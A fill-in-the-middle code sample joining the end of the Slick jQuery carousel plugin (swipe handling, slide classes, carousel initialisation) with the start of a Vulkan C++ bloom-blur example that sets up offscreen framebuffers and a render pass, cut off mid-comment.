(bodyStyle.WebkitTransition !== undefined || bodyStyle.MozTransition !== undefined || bodyStyle.msTransition !== undefined) { if (_.options.useCSS === true) { _.cssTransitions = true; } } if ( _.options.fade ) { if ( typeof _.options.zIndex === 'number' ) { if( _.options.zIndex < 3 ) { _.options.zIndex = 3; } } else { _.options.zIndex = _.defaults.zIndex; } } if (bodyStyle.OTransform !== undefined) { _.animType = 'OTransform'; _.transformType = '-o-transform'; _.transitionType = 'OTransition'; if (bodyStyle.perspectiveProperty === undefined && bodyStyle.webkitPerspective === undefined) _.animType = false; } if (bodyStyle.MozTransform !== undefined) { _.animType = 'MozTransform'; _.transformType = '-moz-transform'; _.transitionType = 'MozTransition'; if (bodyStyle.perspectiveProperty === undefined && bodyStyle.MozPerspective === undefined) _.animType = false; } if (bodyStyle.webkitTransform !== undefined) { _.animType = 'webkitTransform'; _.transformType = '-webkit-transform'; _.transitionType = 'webkitTransition'; if (bodyStyle.perspectiveProperty === undefined && bodyStyle.webkitPerspective === undefined) _.animType = false; } if (bodyStyle.msTransform !== undefined) { _.animType = 'msTransform'; _.transformType = '-ms-transform'; _.transitionType = 'msTransition'; if (bodyStyle.msTransform === undefined) _.animType = false; } if (bodyStyle.transform !== undefined && _.animType !== false) { _.animType = 'transform'; _.transformType = 'transform'; _.transitionType = 'transition'; } _.transformsEnabled = _.options.useTransform && (_.animType !== null && _.animType !== false); }; Slick.prototype.setSlideClasses = function(index) { var _ = this, centerOffset, allSlides, indexOffset, remainder; allSlides = _.$slider .find('.slick-slide') .removeClass('slick-active slick-center slick-current') .attr('aria-hidden', 'true'); _.$slides .eq(index) .addClass('slick-current'); if (_.options.centerMode === 
true) { var evenCoef = _.options.slidesToShow % 2 === 0 ? 1 : 0; centerOffset = Math.floor(_.options.slidesToShow / 2); if (_.options.infinite === true) { if (index >= centerOffset && index <= (_.slideCount - 1) - centerOffset) { _.$slides .slice(index - centerOffset + evenCoef, index + centerOffset + 1) .addClass('slick-active') .attr('aria-hidden', 'false'); } else { indexOffset = _.options.slidesToShow + index; allSlides .slice(indexOffset - centerOffset + 1 + evenCoef, indexOffset + centerOffset + 2) .addClass('slick-active') .attr('aria-hidden', 'false'); } if (index === 0) { allSlides .eq(allSlides.length - 1 - _.options.slidesToShow) .addClass('slick-center'); } else if (index === _.slideCount - 1) { allSlides .eq(_.options.slidesToShow) .addClass('slick-center'); } } _.$slides<|fim▁hole|> if (index >= 0 && index <= (_.slideCount - _.options.slidesToShow)) { _.$slides .slice(index, index + _.options.slidesToShow) .addClass('slick-active') .attr('aria-hidden', 'false'); } else if (allSlides.length <= _.options.slidesToShow) { allSlides .addClass('slick-active') .attr('aria-hidden', 'false'); } else { remainder = _.slideCount % _.options.slidesToShow; indexOffset = _.options.infinite === true ? _.options.slidesToShow + index : index; if (_.options.slidesToShow == _.options.slidesToScroll && (_.slideCount - index) < _.options.slidesToShow) { allSlides .slice(indexOffset - (_.options.slidesToShow - remainder), indexOffset + remainder) .addClass('slick-active') .attr('aria-hidden', 'false'); } else { allSlides .slice(indexOffset, indexOffset + _.options.slidesToShow) .addClass('slick-active') .attr('aria-hidden', 'false'); } } } if (_.options.lazyLoad === 'ondemand' || _.options.lazyLoad === 'anticipated') { _.lazyLoad(); } }; Slick.prototype.setupInfinite = function() { var _ = this, i, slideIndex, infiniteCount; if (_.options.fade === true) { _.options.centerMode = false; } if (_.options.infinite === true && _.options.fade === false) { slideIndex = null; if (_.slideCount > _.options.slidesToShow) { if (_.options.centerMode === true) { infiniteCount = _.options.slidesToShow + 1; } else { infiniteCount = _.options.slidesToShow; } for (i = _.slideCount; i > (_.slideCount - infiniteCount); i -= 1) { slideIndex = i - 1; $(_.$slides[slideIndex]).clone(true).attr('id', '') .attr('data-slick-index', slideIndex - _.slideCount) .prependTo(_.$slideTrack).addClass('slick-cloned'); } for (i = 0; i < infiniteCount + _.slideCount; i += 1) { slideIndex = i; $(_.$slides[slideIndex]).clone(true).attr('id', '') .attr('data-slick-index', slideIndex + _.slideCount) .appendTo(_.$slideTrack).addClass('slick-cloned'); } _.$slideTrack.find('.slick-cloned').find('[id]').each(function() { $(this).attr('id', ''); }); } } }; Slick.prototype.interrupt = function( toggle ) { var _ = this; if( !toggle ) { _.autoPlay(); } _.interrupted = toggle; }; Slick.prototype.selectHandler = function(event) { var _ = this; var targetElement = $(event.target).is('.slick-slide') ? 
$(event.target) : $(event.target).parents('.slick-slide'); var index = parseInt(targetElement.attr('data-slick-index')); if (!index) index = 0; if (_.slideCount <= _.options.slidesToShow) { _.slideHandler(index, false, true); return; } _.slideHandler(index); }; Slick.prototype.slideHandler = function(index, sync, dontAnimate) { var targetSlide, animSlide, oldSlide, slideLeft, targetLeft = null, _ = this, navTarget; sync = sync || false; if (_.animating === true && _.options.waitForAnimate === true) { return; } if (_.options.fade === true && _.currentSlide === index) { return; } if (sync === false) { _.asNavFor(index); } targetSlide = index; targetLeft = _.getLeft(targetSlide); slideLeft = _.getLeft(_.currentSlide); _.currentLeft = _.swipeLeft === null ? slideLeft : _.swipeLeft; if (_.options.infinite === false && _.options.centerMode === false && (index < 0 || index > _.getDotCount() * _.options.slidesToScroll)) { if (_.options.fade === false) { targetSlide = _.currentSlide; if (dontAnimate !== true && _.slideCount > _.options.slidesToShow) { _.animateSlide(slideLeft, function() { _.postSlide(targetSlide); }); } else { _.postSlide(targetSlide); } } return; } else if (_.options.infinite === false && _.options.centerMode === true && (index < 0 || index > (_.slideCount - _.options.slidesToScroll))) { if (_.options.fade === false) { targetSlide = _.currentSlide; if (dontAnimate !== true && _.slideCount > _.options.slidesToShow) { _.animateSlide(slideLeft, function() { _.postSlide(targetSlide); }); } else { _.postSlide(targetSlide); } } return; } if ( _.options.autoplay ) { clearInterval(_.autoPlayTimer); } if (targetSlide < 0) { if (_.slideCount % _.options.slidesToScroll !== 0) { animSlide = _.slideCount - (_.slideCount % _.options.slidesToScroll); } else { animSlide = _.slideCount + targetSlide; } } else if (targetSlide >= _.slideCount) { if (_.slideCount % _.options.slidesToScroll !== 0) { animSlide = 0; } else { animSlide = targetSlide - _.slideCount; } } else { animSlide = targetSlide; } _.animating = true; _.$slider.trigger('beforeChange', [_, _.currentSlide, animSlide]); oldSlide = _.currentSlide; _.currentSlide = animSlide; _.setSlideClasses(_.currentSlide); if ( _.options.asNavFor ) { navTarget = _.getNavTarget(); navTarget = navTarget.slick('getSlick'); if ( navTarget.slideCount <= navTarget.options.slidesToShow ) { navTarget.setSlideClasses(_.currentSlide); } } _.updateDots(); _.updateArrows(); if (_.options.fade === true) { if (dontAnimate !== true) { _.fadeSlideOut(oldSlide); _.fadeSlide(animSlide, function() { _.postSlide(animSlide); }); } else { _.postSlide(animSlide); } _.animateHeight(); return; } if (dontAnimate !== true && _.slideCount > _.options.slidesToShow) { _.animateSlide(targetLeft, function() { _.postSlide(animSlide); }); } else { _.postSlide(animSlide); } }; Slick.prototype.startLoad = function() { var _ = this; if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow.hide(); _.$nextArrow.hide(); } if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { _.$dots.hide(); } _.$slider.addClass('slick-loading'); }; Slick.prototype.swipeDirection = function() { var xDist, yDist, r, swipeAngle, _ = this; xDist = _.touchObject.startX - _.touchObject.curX; yDist = _.touchObject.startY - _.touchObject.curY; r = Math.atan2(yDist, xDist); swipeAngle = Math.round(r * 180 / Math.PI); if (swipeAngle < 0) { swipeAngle = 360 - Math.abs(swipeAngle); } if ((swipeAngle <= 45) && (swipeAngle >= 0)) { return (_.options.rtl === false ? 
'left' : 'right'); } if ((swipeAngle <= 360) && (swipeAngle >= 315)) { return (_.options.rtl === false ? 'left' : 'right'); } if ((swipeAngle >= 135) && (swipeAngle <= 225)) { return (_.options.rtl === false ? 'right' : 'left'); } if (_.options.verticalSwiping === true) { if ((swipeAngle >= 35) && (swipeAngle <= 135)) { return 'down'; } else { return 'up'; } } return 'vertical'; }; Slick.prototype.swipeEnd = function(event) { var _ = this, slideCount, direction; _.dragging = false; _.swiping = false; if (_.scrolling) { _.scrolling = false; return false; } _.interrupted = false; _.shouldClick = ( _.touchObject.swipeLength > 10 ) ? false : true; if ( _.touchObject.curX === undefined ) { return false; } if ( _.touchObject.edgeHit === true ) { _.$slider.trigger('edge', [_, _.swipeDirection() ]); } if ( _.touchObject.swipeLength >= _.touchObject.minSwipe ) { direction = _.swipeDirection(); switch ( direction ) { case 'left': case 'down': slideCount = _.options.swipeToSlide ? _.checkNavigable( _.currentSlide + _.getSlideCount() ) : _.currentSlide + _.getSlideCount(); _.currentDirection = 0; break; case 'right': case 'up': slideCount = _.options.swipeToSlide ? _.checkNavigable( _.currentSlide - _.getSlideCount() ) : _.currentSlide - _.getSlideCount(); _.currentDirection = 1; break; default: } if( direction != 'vertical' ) { _.slideHandler( slideCount ); _.touchObject = {}; _.$slider.trigger('swipe', [_, direction ]); } } else { if ( _.touchObject.startX !== _.touchObject.curX ) { _.slideHandler( _.currentSlide ); _.touchObject = {}; } } }; Slick.prototype.swipeHandler = function(event) { var _ = this; if ((_.options.swipe === false) || ('ontouchend' in document && _.options.swipe === false)) { return; } else if (_.options.draggable === false && event.type.indexOf('mouse') !== -1) { return; } _.touchObject.fingerCount = event.originalEvent && event.originalEvent.touches !== undefined ? event.originalEvent.touches.length : 1; _.touchObject.minSwipe = _.listWidth / _.options .touchThreshold; if (_.options.verticalSwiping === true) { _.touchObject.minSwipe = _.listHeight / _.options .touchThreshold; } switch (event.data.action) { case 'start': _.swipeStart(event); break; case 'move': _.swipeMove(event); break; case 'end': _.swipeEnd(event); break; } }; Slick.prototype.swipeMove = function(event) { var _ = this, edgeWasHit = false, curLeft, swipeDirection, swipeLength, positionOffset, touches, verticalSwipeLength; touches = event.originalEvent !== undefined ? event.originalEvent.touches : null; if (!_.dragging || _.scrolling || touches && touches.length !== 1) { return false; } curLeft = _.getLeft(_.currentSlide); _.touchObject.curX = touches !== undefined ? touches[0].pageX : event.clientX; _.touchObject.curY = touches !== undefined ? touches[0].pageY : event.clientY; _.touchObject.swipeLength = Math.round(Math.sqrt( Math.pow(_.touchObject.curX - _.touchObject.startX, 2))); verticalSwipeLength = Math.round(Math.sqrt( Math.pow(_.touchObject.curY - _.touchObject.startY, 2))); if (!_.options.verticalSwiping && !_.swiping && verticalSwipeLength > 4) { _.scrolling = true; return false; } if (_.options.verticalSwiping === true) { _.touchObject.swipeLength = verticalSwipeLength; } swipeDirection = _.swipeDirection(); if (event.originalEvent !== undefined && _.touchObject.swipeLength > 4) { _.swiping = true; event.preventDefault(); } positionOffset = (_.options.rtl === false ? 1 : -1) * (_.touchObject.curX > _.touchObject.startX ? 
1 : -1); if (_.options.verticalSwiping === true) { positionOffset = _.touchObject.curY > _.touchObject.startY ? 1 : -1; } swipeLength = _.touchObject.swipeLength; _.touchObject.edgeHit = false; if (_.options.infinite === false) { if ((_.currentSlide === 0 && swipeDirection === 'right') || (_.currentSlide >= _.getDotCount() && swipeDirection === 'left')) { swipeLength = _.touchObject.swipeLength * _.options.edgeFriction; _.touchObject.edgeHit = true; } } if (_.options.vertical === false) { _.swipeLeft = curLeft + swipeLength * positionOffset; } else { _.swipeLeft = curLeft + (swipeLength * (_.$list.height() / _.listWidth)) * positionOffset; } if (_.options.verticalSwiping === true) { _.swipeLeft = curLeft + swipeLength * positionOffset; } if (_.options.fade === true || _.options.touchMove === false) { return false; } if (_.animating === true) { _.swipeLeft = null; return false; } _.setCSS(_.swipeLeft); }; Slick.prototype.swipeStart = function(event) { var _ = this, touches; _.interrupted = true; if (_.touchObject.fingerCount !== 1 || _.slideCount <= _.options.slidesToShow) { _.touchObject = {}; return false; } if (event.originalEvent !== undefined && event.originalEvent.touches !== undefined) { touches = event.originalEvent.touches[0]; } _.touchObject.startX = _.touchObject.curX = touches !== undefined ? touches.pageX : event.clientX; _.touchObject.startY = _.touchObject.curY = touches !== undefined ? touches.pageY : event.clientY; _.dragging = true; }; Slick.prototype.unfilterSlides = Slick.prototype.slickUnfilter = function() { var _ = this; if (_.$slidesCache !== null) { _.unload(); _.$slideTrack.children(this.options.slide).detach(); _.$slidesCache.appendTo(_.$slideTrack); _.reinit(); } }; Slick.prototype.unload = function() { var _ = this; $('.slick-cloned', _.$slider).remove(); if (_.$dots) { _.$dots.remove(); } if (_.$prevArrow && _.htmlExpr.test(_.options.prevArrow)) { _.$prevArrow.remove(); } if (_.$nextArrow && _.htmlExpr.test(_.options.nextArrow)) { _.$nextArrow.remove(); } _.$slides .removeClass('slick-slide slick-active slick-visible slick-current') .attr('aria-hidden', 'true') .css('width', ''); }; Slick.prototype.unslick = function(fromBreakpoint) { var _ = this; _.$slider.trigger('unslick', [_, fromBreakpoint]); _.destroy(); }; Slick.prototype.updateArrows = function() { var _ = this, centerOffset; centerOffset = Math.floor(_.options.slidesToShow / 2); if ( _.options.arrows === true && _.slideCount > _.options.slidesToShow && !_.options.infinite ) { _.$prevArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); _.$nextArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); if (_.currentSlide === 0) { _.$prevArrow.addClass('slick-disabled').attr('aria-disabled', 'true'); _.$nextArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); } else if (_.currentSlide >= _.slideCount - _.options.slidesToShow && _.options.centerMode === false) { _.$nextArrow.addClass('slick-disabled').attr('aria-disabled', 'true'); _.$prevArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); } else if (_.currentSlide >= _.slideCount - 1 && _.options.centerMode === true) { _.$nextArrow.addClass('slick-disabled').attr('aria-disabled', 'true'); _.$prevArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); } } }; Slick.prototype.updateDots = function() { var _ = this; if (_.$dots !== null) { _.$dots .find('li') .removeClass('slick-active') .end(); _.$dots .find('li') .eq(Math.floor(_.currentSlide / _.options.slidesToScroll)) 
.addClass('slick-active'); } }; Slick.prototype.visibility = function() { var _ = this; if ( _.options.autoplay ) { if ( document[_.hidden] ) { _.interrupted = true; } else { _.interrupted = false; } } }; $.fn.slick = function() { var _ = this, opt = arguments[0], args = Array.prototype.slice.call(arguments, 1), l = _.length, i, ret; for (i = 0; i < l; i++) { if (typeof opt == 'object' || typeof opt == 'undefined') _[i].slick = new Slick(_[i], opt); else ret = _[i].slick[opt].apply(_[i].slick, args); if (typeof ret != 'undefined') return ret; } return _; }; $( document ).ready(function() { $( '.exopite-multifilter-items.slick-carousel' ).each(function ( idx, item ) { var carouselId = "slick-carousel" + idx; var data = $( this ).parent( '.exopite-multifilter-container' ).data( 'carousel' ); if ( typeof data !== "undefined" ) { this.id = carouselId; $( this ).slick({ autoplay: ( data.autoplay === 'false' ) ? false : true, arrows: ( data.arrows === 'false' ) ? false : true, autoplaySpeed: data.autoplay_speed, infinite: ( data.infinite === 'false' ) ? false : true, speed: parseInt( data.speed ), pauseOnHover: ( data.pause_on_hover === 'false' ) ? false : true, dots: ( data.dots === 'false' ) ? false : true, adaptiveHeight: ( data.adaptive_height === 'false' ) ? false : true, mobileFirst: ( data.mobile_first === 'false' ) ? false : true, slidesPerRow: parseInt( data.slides_per_row ), slidesToShow: parseInt( data.slides_to_show ), slidesToScroll: parseInt( data.slides_to_scroll ), useTransform: ( data.use_transform === 'false' ) ? false : true, }); } }); }); }));<|fim▁end|>
.eq(index) .addClass('slick-center'); } else {
<|file_name|>bloom.cpp<|end_file_name|><|fim▁begin|>/* * Vulkan Example - Implements a separable two-pass fullscreen blur (also known as bloom) * * Copyright (C) 2016 by Sascha Willems - www.saschawillems.de * * This code is licensed under the MIT license (MIT) (http://opensource.org/licenses/MIT) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> #include <vector> #define GLM_FORCE_RADIANS #define GLM_FORCE_DEPTH_ZERO_TO_ONE #include <glm/glm.hpp> #include <glm/gtc/matrix_transform.hpp> #include <vulkan/vulkan.h> #include "vulkanexamplebase.h" #define VERTEX_BUFFER_BIND_ID 0 #define ENABLE_VALIDATION false // Offscreen frame buffer properties #define FB_DIM 256 #define FB_COLOR_FORMAT VK_FORMAT_R8G8B8A8_UNORM // Vertex layout for this example std::vector<vkMeshLoader::VertexLayout> vertexLayout = { vkMeshLoader::VERTEX_LAYOUT_POSITION, vkMeshLoader::VERTEX_LAYOUT_UV, vkMeshLoader::VERTEX_LAYOUT_COLOR, vkMeshLoader::VERTEX_LAYOUT_NORMAL }; class VulkanExample : public VulkanExampleBase { public: bool bloom = true; struct { vkTools::VulkanTexture cubemap; } textures; struct { vkMeshLoader::MeshBuffer ufo; vkMeshLoader::MeshBuffer ufoGlow; vkMeshLoader::MeshBuffer skyBox; vkMeshLoader::MeshBuffer quad; } meshes; struct { VkPipelineVertexInputStateCreateInfo inputState; std::vector<VkVertexInputBindingDescription> bindingDescriptions; std::vector<VkVertexInputAttributeDescription> attributeDescriptions; } vertices; struct { vkTools::UniformData vsScene; vkTools::UniformData vsFullScreen; vkTools::UniformData vsSkyBox; vkTools::UniformData fsVertBlur; vkTools::UniformData fsHorzBlur; } uniformData; struct UBO { glm::mat4 projection; glm::mat4 model; }; struct UBOBlur { float blurScale = 1.0f; float blurStrength = 1.5f; uint32_t horizontal; }; struct { UBO scene, fullscreen, skyBox; UBOBlur vertBlur, horzBlur; } ubos; struct { VkPipeline blurVert; VkPipeline blurHorz; VkPipeline glowPass; VkPipeline phongPass; VkPipeline skyBox; } pipelines; // Pipeline layout is shared amongst all descriptor sets VkPipelineLayout pipelineLayout; struct { VkDescriptorSet scene; VkDescriptorSet verticalBlur; VkDescriptorSet horizontalBlur; VkDescriptorSet skyBox; } descriptorSets; // Descriptor set layout is shared amongst all descriptor sets VkDescriptorSetLayout descriptorSetLayout; // Framebuffer for offscreen rendering struct FrameBufferAttachment { VkImage image; VkDeviceMemory mem; VkImageView view; }; struct FrameBuffer { VkFramebuffer framebuffer; FrameBufferAttachment color, depth; VkDescriptorImageInfo descriptor; }; struct OffscreenPass { int32_t width, height; VkRenderPass renderPass; VkSampler sampler; VkCommandBuffer commandBuffer = VK_NULL_HANDLE; // Semaphore used to synchronize between offscreen and final scene rendering VkSemaphore semaphore = VK_NULL_HANDLE; std::array<FrameBuffer, 2> framebuffers; } offscreenPass; VulkanExample() : VulkanExampleBase(ENABLE_VALIDATION) { zoom = -10.25f; rotation = { 7.5f, -343.0f, 0.0f }; timerSpeed *= 0.5f; enableTextOverlay = true; title = "Vulkan Example - Bloom"; } ~VulkanExample() { // Clean up used Vulkan resources // Note : Inherited destructor cleans up resources stored in base class vkDestroySampler(device, offscreenPass.sampler, nullptr); // Frame buffer for (auto& framebuffer : offscreenPass.framebuffers) { // Attachments vkDestroyImageView(device, framebuffer.color.view, nullptr); vkDestroyImage(device, framebuffer.color.image, nullptr); vkFreeMemory(device, framebuffer.color.mem, nullptr); vkDestroyImageView(device, 
framebuffer.depth.view, nullptr); vkDestroyImage(device, framebuffer.depth.image, nullptr); vkFreeMemory(device, framebuffer.depth.mem, nullptr); vkDestroyFramebuffer(device, framebuffer.framebuffer, nullptr); } vkDestroyRenderPass(device, offscreenPass.renderPass, nullptr); vkFreeCommandBuffers(device, cmdPool, 1, &offscreenPass.commandBuffer); vkDestroySemaphore(device, offscreenPass.semaphore, nullptr); vkDestroyPipeline(device, pipelines.blurHorz, nullptr); vkDestroyPipeline(device, pipelines.blurVert, nullptr); vkDestroyPipeline(device, pipelines.phongPass, nullptr); vkDestroyPipeline(device, pipelines.glowPass, nullptr); vkDestroyPipeline(device, pipelines.skyBox, nullptr); vkDestroyPipelineLayout(device, pipelineLayout, nullptr); vkDestroyDescriptorSetLayout(device, descriptorSetLayout, nullptr); // Meshes vkMeshLoader::freeMeshBufferResources(device, &meshes.ufo); vkMeshLoader::freeMeshBufferResources(device, &meshes.ufoGlow); vkMeshLoader::freeMeshBufferResources(device, &meshes.skyBox); vkMeshLoader::freeMeshBufferResources(device, &meshes.quad); // Uniform buffers vkTools::destroyUniformData(device, &uniformData.vsScene); vkTools::destroyUniformData(device, &uniformData.vsFullScreen); vkTools::destroyUniformData(device, &uniformData.vsSkyBox); vkTools::destroyUniformData(device, &uniformData.fsVertBlur); vkTools::destroyUniformData(device, &uniformData.fsHorzBlur); textureLoader->destroyTexture(textures.cubemap); } // Sets up one of the offscreen framebuffers used by the bloom blur passes // The color attachment of this framebuffer will then be sampled from void prepareOffscreenFramebuffer(FrameBuffer *frameBuf, VkFormat colorFormat, VkFormat depthFormat) { // Color attachment VkImageCreateInfo image = vkTools::initializers::imageCreateInfo(); image.imageType = VK_IMAGE_TYPE_2D; image.format = colorFormat; image.extent.width = FB_DIM; image.extent.height = FB_DIM; image.extent.depth = 1; image.mipLevels = 1; image.arrayLayers = 1; image.samples = VK_SAMPLE_COUNT_1_BIT; image.tiling = VK_IMAGE_TILING_OPTIMAL; // We will sample directly from the color attachment image.usage = VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT | VK_IMAGE_USAGE_SAMPLED_BIT; VkMemoryAllocateInfo memAlloc = vkTools::initializers::memoryAllocateInfo(); VkMemoryRequirements memReqs; VkImageViewCreateInfo colorImageView = vkTools::initializers::imageViewCreateInfo(); colorImageView.viewType = VK_IMAGE_VIEW_TYPE_2D; colorImageView.format = colorFormat; colorImageView.flags = 0; colorImageView.subresourceRange = {}; colorImageView.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; colorImageView.subresourceRange.baseMipLevel = 0; colorImageView.subresourceRange.levelCount = 1; colorImageView.subresourceRange.baseArrayLayer = 0; colorImageView.subresourceRange.layerCount = 1; VK_CHECK_RESULT(vkCreateImage(device, &image, nullptr, &frameBuf->color.image)); vkGetImageMemoryRequirements(device, frameBuf->color.image, &memReqs); memAlloc.allocationSize = memReqs.size; memAlloc.memoryTypeIndex = vulkanDevice->getMemoryType(memReqs.memoryTypeBits, VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT); VK_CHECK_RESULT(vkAllocateMemory(device, &memAlloc, nullptr, &frameBuf->color.mem)); VK_CHECK_RESULT(vkBindImageMemory(device, frameBuf->color.image, frameBuf->color.mem, 0)); colorImageView.image = frameBuf->color.image; VK_CHECK_RESULT(vkCreateImageView(device, &colorImageView, nullptr, &frameBuf->color.view)); // Depth stencil attachment image.format = depthFormat; image.usage = VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT; VkImageViewCreateInfo 
depthStencilView = vkTools::initializers::imageViewCreateInfo(); depthStencilView.viewType = VK_IMAGE_VIEW_TYPE_2D; depthStencilView.format = depthFormat; depthStencilView.flags = 0; depthStencilView.subresourceRange = {}; depthStencilView.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; depthStencilView.subresourceRange.baseMipLevel = 0; depthStencilView.subresourceRange.levelCount = 1; depthStencilView.subresourceRange.baseArrayLayer = 0; depthStencilView.subresourceRange.layerCount = 1; VK_CHECK_RESULT(vkCreateImage(device, &image, nullptr, &frameBuf->depth.image)); vkGetImageMemoryRequirements(device, frameBuf->depth.image, &memReqs); memAlloc.allocationSize = memReqs.size; memAlloc.memoryTypeIndex = vulkanDevice->getMemoryType(memReqs.memoryTypeBits, VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT); VK_CHECK_RESULT(vkAllocateMemory(device, &memAlloc, nullptr, &frameBuf->depth.mem)); VK_CHECK_RESULT(vkBindImageMemory(device, frameBuf->depth.image, frameBuf->depth.mem, 0)); depthStencilView.image = frameBuf->depth.image; VK_CHECK_RESULT(vkCreateImageView(device, &depthStencilView, nullptr, &frameBuf->depth.view)); VkImageView attachments[2]; attachments[0] = frameBuf->color.view; attachments[1] = frameBuf->depth.view; VkFramebufferCreateInfo fbufCreateInfo = vkTools::initializers::framebufferCreateInfo(); fbufCreateInfo.renderPass = offscreenPass.renderPass; fbufCreateInfo.attachmentCount = 2; fbufCreateInfo.pAttachments = attachments; fbufCreateInfo.width = FB_DIM; fbufCreateInfo.height = FB_DIM; fbufCreateInfo.layers = 1; VK_CHECK_RESULT(vkCreateFramebuffer(device, &fbufCreateInfo, nullptr, &frameBuf->framebuffer)); // Fill a descriptor for later use in a descriptor set frameBuf->descriptor.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; frameBuf->descriptor.imageView = frameBuf->color.view; frameBuf->descriptor.sampler = offscreenPass.sampler; } // Prepare the offscreen framebuffers used for the vertical- and horizontal blur void prepareOffscreen() { offscreenPass.width = FB_DIM; offscreenPass.height = FB_DIM; // Find a suitable depth format VkFormat fbDepthFormat; VkBool32 validDepthFormat = vkTools::getSupportedDepthFormat(physicalDevice, &fbDepthFormat); assert(validDepthFormat); // Create a separate render pass for the offscreen rendering as it may differ from the one used for scene rendering std::array<VkAttachmentDescription, 2> attchmentDescriptions = {}; // Color attachment attchmentDescriptions[0].format = FB_COLOR_FORMAT; attchmentDescriptions[0].samples = VK_SAMPLE_COUNT_1_BIT; attchmentDescriptions[0].loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attchmentDescriptions[0].storeOp = VK_ATTACHMENT_STORE_OP_STORE; attchmentDescriptions[0].stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; attchmentDescriptions[0].stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attchmentDescriptions[0].initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; attchmentDescriptions[0].finalLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; // Depth attachment attchmentDescriptions[1].format = fbDepthFormat; attchmentDescriptions[1].samples = VK_SAMPLE_COUNT_1_BIT; attchmentDescriptions[1].loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attchmentDescriptions[1].storeOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attchmentDescriptions[1].stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; attchmentDescriptions[1].stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attchmentDescriptions[1].initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; attchmentDescriptions[1].finalLayout = 
VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; VkAttachmentReference colorReference = { 0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL }; VkAttachmentReference depthReference = { 1, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL }; VkSubpassDescription subpassDescription = {}; subpassDescription.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; subpassDescription.colorAttachmentCount = 1; subpassDescription.pColorAttachments = &colorReference; subpassDescription.pDepthStencilAttachment = &depthReference; // Use subpass dependencies for layout transitions std::array<VkSubpassDependency, 2> dependencies; dependencies[0].srcSubpass = VK_SUBPASS_EXTERNAL; dependencies[0].dstSubpass = 0; dependencies[0].srcStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT; dependencies[0].dstStageMask = VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT; dependencies[0].srcAccessMask = VK_ACCESS_MEMORY_READ_BIT; dependencies[0].dstAccessMask = VK_ACCESS_COLOR_ATTACHMENT_READ_BIT | VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; dependencies[0].dependencyFlags = VK_DEPENDENCY_BY_REGION_BIT; dependencies[1].srcSubpass = 0; dependencies[1].dstSubpass = VK_SUBPASS_EXTERNAL; dependencies[1].srcStageMask = VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT; dependencies[1].dstStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT; dependencies[1].srcAccessMask = VK_ACCESS_COLOR_ATTACHMENT_READ_BIT | VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; dependencies[1].dstAccessMask = VK_ACCESS_MEMORY_READ_BIT; dependencies[1].dependencyFlags = VK_DEPENDENCY_BY_REGION_BIT; // Create the actual renderpass VkRenderPassCreateInfo renderPassInfo = {}; renderPassInfo.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; renderPassInfo.attachmentCount = static_cast<uint32_t>(attchmentDescriptions.size()); renderPassInfo.pAttachments = attchmentDescriptions.data(); renderPassInfo.subpassCount = 1; renderPassInfo.pSubpasses = &subpassDescription; renderPassInfo.dependencyCount = static_cast<uint32_t>(dependencies.size()); renderPassInfo.pDependencies = dependencies.data(); VK_CHECK_RESULT(vkCreateRenderPass(device, &renderPassInfo, nullptr, &offscreenPass.renderPass)); // Create sampler to sample from the color attachments VkSamplerCreateInfo sampler = vkTools::initializers::samplerCreateInfo(); sampler.magFilter = VK_FILTER_LINEAR; sampler.minFilter = VK_FILTER_LINEAR; sampler.mipmapMode = VK_SAMPLER_MIPMAP_MODE_LINEAR; sampler.addressModeU = VK_SAMPLER_ADDRESS_MODE_CLAMP_TO_EDGE; sampler.addressModeV = sampler.addressModeU; sampler.addressModeW = sampler.addressModeU; sampler.mipLodBias = 0.0f; sampler.maxAnisotropy = 0; sampler.minLod = 0.0f; sampler.maxLod = 1.0f; sampler.borderColor = VK_BORDER_COLOR_FLOAT_OPAQUE_WHITE; VK_CHECK_RESULT(vkCreateSampler(device, &sampler, nullptr, &offscreenPass.sampler)); // Create two frame buffers prepareOffscreenFramebuffer(&offscreenPass.framebuffers[0], FB_COLOR_FORMAT, fbDepthFormat); prepareOffscreenFramebuffer(&offscreenPass.framebuffers[1], FB_COLOR_FORMAT, fbDepthFormat); } // Sets up the command buffer that renders the scene to the offscreen frame buffer // The blur method used in this example is multi pass and renders the vertical // blur first and then the 